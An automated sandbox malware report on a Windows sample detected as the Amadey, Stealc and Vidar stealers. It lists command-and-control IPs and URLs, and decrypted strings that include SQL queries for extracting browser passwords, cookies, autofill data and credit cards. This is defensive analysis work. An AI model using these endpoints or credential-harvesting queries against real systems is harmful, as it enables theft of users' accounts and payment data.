Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483400
MD5: c8b29f4c8c60a861b941dc46c03d41bc
SHA1: 43e5e1266128f01d074d3aba20465ab19d26050b
SHA256: afddc92c285934cfa180d497fd271e5eae08117765a5797b3ecbd5bdeafe49d0
Tags: exeStealc
Infos:

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/15.113.19/ Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.phpvWn Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/ferences.SourceAumid1 Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/AppData Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dllRZT Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR= Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php2? Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpwb Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/ons Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.phposition: Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpv? Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.php; Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php# Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpn? Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\userAKKKFBGDHJ.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1312596
Found malware configuration
Source: 0.2.file.exe.40b0e67.1.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: 624f4d727e.exe.6648.24.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
Source: explorti.exe.7696.19.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.19/15.113.19/ Virustotal: Detection: 15% Perma Link
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Virustotal: Detection: 17% Perma Link
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded Virustotal: Detection: 8% Perma Link
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll/ Virustotal: Detection: 24% Perma Link
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Virustotal: Detection: 17% Perma Link
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Virustotal: Detection: 9% Perma Link
Source: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR= Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 40% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\userAKKKFBGDHJ.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 22
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 08
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 20
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 24
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Sleep
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: user32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sscanf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: silence
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sila
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HeapFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Process32Next
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Process32First
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LocalFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindClose
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ReadFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: WriteFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLastError
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SelectObject
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BitBlt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrStrA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrCmpCW
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PathMatchSpecA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RmStartSession
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RmRegisterResources
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RmGetList
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RmEndSession
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_open
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_step
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_column_text
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_finalize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_close
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: encrypted_key
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PATH
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: NSS_Init
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: NSS_Shutdown
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PK11_Authenticate
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: C:\ProgramData\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: browser:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: profile:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: url:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: login:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: password:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Opera
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: OperaGX
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Network
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: cookies
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: .txt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: TRUE
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FALSE
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: autofill
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: history
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: cc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: name:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: month:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: year:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: card:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Cookies
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Login Data
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Web Data
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: History
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: logins.json
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: formSubmitURL
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: usernameField
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: encryptedUsername
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: encryptedPassword
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: guid
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: cookies.sqlite
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: formhistory.sqlite
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: places.sqlite
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: plugins
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Local Extension Settings
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Sync Extension Settings
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: IndexedDB
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Opera Stable
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Opera GX Stable
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CURRENT
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: chrome-extension_
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Local State
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: profiles.ini
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: chrome
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: opera
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: firefox
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wallets
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ProductName
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: x32
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: x64
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ProcessorNameString
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DisplayName
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DisplayVersion
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Network Info:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - IP: IP?
